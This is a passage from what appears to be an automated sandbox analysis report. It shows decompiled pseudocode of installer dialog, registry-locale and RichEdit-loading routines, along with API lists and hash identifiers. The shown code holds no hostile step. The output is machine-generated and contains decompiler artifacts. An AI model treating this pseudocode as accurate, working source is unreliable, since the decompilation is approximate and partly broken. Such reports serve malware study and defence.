						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                                    0x00403a4e
                                                                                                    0x00403a57
                                                                                                    0x00403b98
                                                                                                    0x00403b9c
                                                                                                    0x00403ba0
                                                                                                    0x00403ba2
                                                                                                    0x00403ba7
                                                                                                    0x00403bb2
                                                                                                    0x00403bbd
                                                                                                    0x00403bc2
                                                                                                    0x00403bc4
                                                                                                    0x00403bc6
                                                                                                    0x00403bc9
                                                                                                    0x00403bce
                                                                                                    0x00403bdc
                                                                                                    0x00403be9
                                                                                                    0x00403bf0
                                                                                                    0x00403bf0
                                                                                                    0x00403bf1
                                                                                                    0x00403bf1
                                                                                                    0x00403bf6
                                                                                                    0x00403bfc
                                                                                                    0x00403c03
                                                                                                    0x00403c09
                                                                                                    0x00403c0b
                                                                                                    0x00403c4b
                                                                                                    0x00403c50
                                                                                                    0x00403c55
                                                                                                    0x00403c55
                                                                                                    0x00403c5a
                                                                                                    0x00403c63
                                                                                                    0x00403c65
                                                                                                    0x00403c6a
                                                                                                    0x00403c70
                                                                                                    0x00403c74
                                                                                                    0x00403c74
                                                                                                    0x00403c79
                                                                                                    0x00403c7f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403c8a
                                                                                                    0x00403c90
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403c99
                                                                                                    0x00403ca1
                                                                                                    0x00403ca6
                                                                                                    0x00403ca9
                                                                                                    0x00403caf
                                                                                                    0x00403cb4
                                                                                                    0x00403cb7
                                                                                                    0x00403cbd
                                                                                                    0x00403cc2
                                                                                                    0x00403cc5
                                                                                                    0x00403ccb
                                                                                                    0x00403cd3
                                                                                                    0x00403cd9
                                                                                                    0x00403cdf
                                                                                                    0x00403ce3
                                                                                                    0x00403cea
                                                                                                    0x00403cea
                                                                                                    0x00403cea
                                                                                                    0x00403cf4
                                                                                                    0x00403d06
                                                                                                    0x00403d12
                                                                                                    0x00403d17
                                                                                                    0x00403d21
                                                                                                    0x00403d27
                                                                                                    0x00403d29
                                                                                                    0x00403d2e
                                                                                                    0x00403d2b
                                                                                                    0x00403d2b
                                                                                                    0x00403d2b
                                                                                                    0x00403d3e
                                                                                                    0x00403d56
                                                                                                    0x00403d58
                                                                                                    0x00403d5e
                                                                                                    0x00403d73
                                                                                                    0x00403d60
                                                                                                    0x00403d69
                                                                                                    0x00403d6b
                                                                                                    0x00403d6b
                                                                                                    0x00403d79
                                                                                                    0x00403d89
                                                                                                    0x00403d9a
                                                                                                    0x00403da1
                                                                                                    0x00403da7
                                                                                                    0x00403dab
                                                                                                    0x00403db0
                                                                                                    0x00403db2
                                                                                                    0x00000000
                                                                                                    0x00403db8
                                                                                                    0x00403db8
                                                                                                    0x00403dba
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403dc0
                                                                                                    0x00403dc4
                                                                                                    0x00403de9
                                                                                                    0x00403def
                                                                                                    0x00403df5
                                                                                                    0x00403df7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403e1d
                                                                                                    0x00403e23
                                                                                                    0x00403e25
                                                                                                    0x00403e2a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403e30
                                                                                                    0x00403e33
                                                                                                    0x00403e36
                                                                                                    0x00403e4d
                                                                                                    0x00403e59
                                                                                                    0x00403e72
                                                                                                    0x00403e78
                                                                                                    0x00403e7c
                                                                                                    0x00403e81
                                                                                                    0x00403e87
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403e91
                                                                                                    0x00403e9c
                                                                                                    0x00000000
                                                                                                    0x00403e9c
                                                                                                    0x00403dc6
                                                                                                    0x00403dcc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403dd2
                                                                                                    0x00403dd8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403dde
                                                                                                    0x00403db2
                                                                                                    0x00403ea9
                                                                                                    0x00403eb5
                                                                                                    0x00403ebc
                                                                                                    0x00000000
                                                                                                    0x00403c0d
                                                                                                    0x00403c0d
                                                                                                    0x00403c10
                                                                                                    0x00403c43
                                                                                                    0x00403c43
                                                                                                    0x00403c45
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403c45
                                                                                                    0x00403c12
                                                                                                    0x00403c16
                                                                                                    0x00403c1b
                                                                                                    0x00403c1d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403c2d
                                                                                                    0x00403c35
                                                                                                    0x00000000
                                                                                                    0x00403c3b
                                                                                                    0x00403a69
                                                                                                    0x00403a69
                                                                                                    0x00403a6d
                                                                                                    0x00403a72
                                                                                                    0x00403a81
                                                                                                    0x00403a81
                                                                                                    0x00403a8a
                                                                                                    0x00403a93
                                                                                                    0x00403a9e
                                                                                                    0x00403a9e
                                                                                                    0x00403aaa
                                                                                                    0x00403ac6
                                                                                                    0x00403ac9
                                                                                                    0x00403adc
                                                                                                    0x00403ae2
                                                                                                    0x00403b85
                                                                                                    0x00000000
                                                                                                    0x00403b8e
                                                                                                    0x00403ae8
                                                                                                    0x00403af5
                                                                                                    0x00403af7
                                                                                                    0x00403af9
                                                                                                    0x00403b18
                                                                                                    0x00403b18
                                                                                                    0x00403b1b
                                                                                                    0x00403b20
                                                                                                    0x00403b23
                                                                                                    0x00403b33
                                                                                                    0x00403b34
                                                                                                    0x00403b36
                                                                                                    0x00403b6c
                                                                                                    0x00403b7f
                                                                                                    0x00000000
                                                                                                    0x00403b7f
                                                                                                    0x00403b38
                                                                                                    0x00403b3e
                                                                                                    0x00403b57
                                                                                                    0x00403b5c
                                                                                                    0x00403b5e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403b60
                                                                                                    0x00403b4c
                                                                                                    0x00403b4c
                                                                                                    0x00403b4e
                                                                                                    0x00403b4e
                                                                                                    0x00000000
                                                                                                    0x00403b4e
                                                                                                    0x00403b41
                                                                                                    0x00403b46
                                                                                                    0x00000000
                                                                                                    0x00403b46
                                                                                                    0x00403b25
                                                                                                    0x00403b2b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403b2d
                                                                                                    0x00000000
                                                                                                    0x00403b2d
                                                                                                    0x00403b1d
                                                                                                    0x00000000
                                                                                                    0x00403b1d
                                                                                                    0x00403b03
                                                                                                    0x00403b0a
                                                                                                    0x00403b10
                                                                                                    0x00403b12
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403b12
                                                                                                    0x00403ace
                                                                                                    0x00000000
                                                                                                    0x00403aac
                                                                                                    0x00403ab2
                                                                                                    0x00403abc
                                                                                                    0x00403ec2
                                                                                                    0x00403ec8
                                                                                                    0x00403ed5
                                                                                                    0x00403edb
                                                                                                    0x00403edb
                                                                                                    0x00403ee5
                                                                                                    0x00000000
                                                                                                    0x00403ee5
                                                                                                    0x00403aaa

                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                    • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                    • DestroyWindow.USER32 ref: 00403AB2
                                                                                                    • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                    • GetDlgItem.USER32 ref: 00403AEF
                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                    • GetDlgItem.USER32 ref: 00403BB8
                                                                                                    • GetDlgItem.USER32 ref: 00403BC2
                                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                    • GetDlgItem.USER32 ref: 00403CD3
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                    • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                    • lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                                    • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 184305955-0
                                                                                                    • Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                    • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                    • Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                                    • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004036AF, Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 216stringregistrylibraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E004036AF() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x423eb0;
				_t20 = E00405E88(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x4204a0;
					 *0x42a000 = 0x7830;
					E00405A4D(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x4204a0, 0);
					__eflags =  *0x4204a0;
					if(__eflags == 0) {
						E00405A4D(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x4204a0, 0);
					}
					lstrcatA(0x42a000, _t79);
				} else {
					E00405AC4(0x42a000,  *_t20() & 0x0000ffff);
				}
				E00403978(_t76, _t88);
				 *0x423f20 =  *0x423eb8 & 0x00000020;
				 *0x423f3c = 0x10000;
				if(E0040573A(_t88, 0x429400) != 0) {
					L16:
					if(E0040573A(_t96, 0x429400) == 0) {
						E00405B88(0, _t79, _t81, 0x429400,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040);
					 *0x423688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403978(_t76, __eflags);
							__eflags =  *0x423f40;
							if( *0x423f40 != 0) {
								_t31 = E00404FD6(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42366c;
								if( *0x42366c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420478, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x423640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423640);
								 *0x423664 = _t86;
								RegisterClassA(0x423640);
							}
							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403A45, 0);
							E004035FF(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423ea0;
						 *0x423654 = _t28;
						_v20 = 0x624e5f;
						 *0x423644 = E00401000;
						 *0x423650 =  *0x423ea0;
						 *0x423664 =  &_v20;
						if(RegisterClassA(0x423640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420478 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422e40;
					E00405A4D( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
					_t62 =  *0x422e40;
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422e41;
						 *((char*)(E00405684(0x422e41, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B66(0x429400, E00405659(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056A0(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                    0x004036b5
                                                                                                    0x004036be
                                                                                                    0x004036c5
                                                                                                    0x004036c7
                                                                                                    0x004036db
                                                                                                    0x004036ed
                                                                                                    0x004036f7
                                                                                                    0x004036fc
                                                                                                    0x00403702
                                                                                                    0x00403715
                                                                                                    0x00403715
                                                                                                    0x00403720
                                                                                                    0x004036c9
                                                                                                    0x004036d4
                                                                                                    0x004036d4
                                                                                                    0x00403725
                                                                                                    0x00403738
                                                                                                    0x0040373d
                                                                                                    0x0040374e
                                                                                                    0x004037d5
                                                                                                    0x004037dd
                                                                                                    0x004037e6
                                                                                                    0x004037e6
                                                                                                    0x004037fc
                                                                                                    0x00403802
                                                                                                    0x00403810
                                                                                                    0x0040389f
                                                                                                    0x004038a7
                                                                                                    0x004038b1
                                                                                                    0x004038b6
                                                                                                    0x004038bc
                                                                                                    0x00403946
                                                                                                    0x0040394b
                                                                                                    0x0040394d
                                                                                                    0x00403969
                                                                                                    0x00000000
                                                                                                    0x00403969
                                                                                                    0x0040394f
                                                                                                    0x00403955
                                                                                                    0x0040395d
                                                                                                    0x0040395d
                                                                                                    0x00000000
                                                                                                    0x00403955
                                                                                                    0x004038ca
                                                                                                    0x004038db
                                                                                                    0x004038dd
                                                                                                    0x004038df
                                                                                                    0x004038e6
                                                                                                    0x004038e6
                                                                                                    0x004038ee
                                                                                                    0x004038f6
                                                                                                    0x004038f8
                                                                                                    0x004038fa
                                                                                                    0x00403903
                                                                                                    0x00403906
                                                                                                    0x0040390c
                                                                                                    0x0040390c
                                                                                                    0x0040392b
                                                                                                    0x0040393c
                                                                                                    0x00000000
                                                                                                    0x00403941
                                                                                                    0x004038a9
                                                                                                    0x004038ab
                                                                                                    0x00000000
                                                                                                    0x00403816
                                                                                                    0x00403816
                                                                                                    0x0040381c
                                                                                                    0x00403826
                                                                                                    0x0040382e
                                                                                                    0x00403838
                                                                                                    0x0040383e
                                                                                                    0x0040384c
                                                                                                    0x0040396e
                                                                                                    0x0040396e
                                                                                                    0x00000000
                                                                                                    0x0040396e
                                                                                                    0x00403852
                                                                                                    0x0040385b
                                                                                                    0x0040389a
                                                                                                    0x00000000
                                                                                                    0x0040389a
                                                                                                    0x00403754
                                                                                                    0x00403754
                                                                                                    0x00403759
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403763
                                                                                                    0x00403773
                                                                                                    0x00403778
                                                                                                    0x0040377f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403783
                                                                                                    0x00403785
                                                                                                    0x00403792
                                                                                                    0x00403792
                                                                                                    0x0040379a
                                                                                                    0x004037a0
                                                                                                    0x004037c8
                                                                                                    0x004037d0
                                                                                                    0x00000000
                                                                                                    0x004037b2
                                                                                                    0x004037b3
                                                                                                    0x004037bc
                                                                                                    0x004037c2
                                                                                                    0x004037c3
                                                                                                    0x00000000
                                                                                                    0x004037c3
                                                                                                    0x004037be
                                                                                                    0x004037c0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004037c0
                                                                                                    0x004037a0

                                                                                                    APIs
                                                                                                      • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                      • Part of subcall function 00405E88: LoadLibraryA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                      • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                    • lstrcatA.KERNEL32(0042A000,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,00429000,00000000,0042A400,00000000), ref: 00403720
                                                                                                    • lstrlenA.KERNEL32(00422E40,?,?,?,00422E40,00000000,00429400,0042A000,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000,00000006,00429000), ref: 00403795
                                                                                                    • lstrcmpiA.KERNEL32(?,.exe,00422E40,?,?,?,00422E40,00000000,00429400,0042A000,004204A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204A0,00000000), ref: 004037A8
                                                                                                    • GetFileAttributesA.KERNEL32(00422E40), ref: 004037B3
                                                                                                    • LoadImageA.USER32 ref: 004037FC
                                                                                                      • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                    • RegisterClassA.USER32 ref: 00403843
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040385B
                                                                                                    • CreateWindowExA.USER32 ref: 00403894
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 004038CA
                                                                                                    • LoadLibraryA.KERNEL32(RichEd20), ref: 004038DB
                                                                                                    • LoadLibraryA.KERNEL32(RichEd32), ref: 004038E6
                                                                                                    • GetClassInfoA.USER32 ref: 004038F6
                                                                                                    • GetClassInfoA.USER32 ref: 00403903
                                                                                                    • RegisterClassA.USER32 ref: 0040390C
                                                                                                    • DialogBoxParamA.USER32 ref: 0040392B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@.B$@6B$A.B$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                    • API String ID: 914957316-4089148134
                                                                                                    • Opcode ID: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                    • Instruction ID: 5edcd83abe1923a5ef33726047749e404321c8c293ca1ea02831498dc8d0bb6f
                                                                                                    • Opcode Fuzzy Hash: 6186cd0dc7f5b8c4dd386d80bd90aa2821d034a13263318605b4bd1c267fc880
                                                                                                    • Instruction Fuzzy Hash: A961A3B16442007FD720AF659D45E2B3AADEB4475AF40457FF940B22E1D77CAD01CA2E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
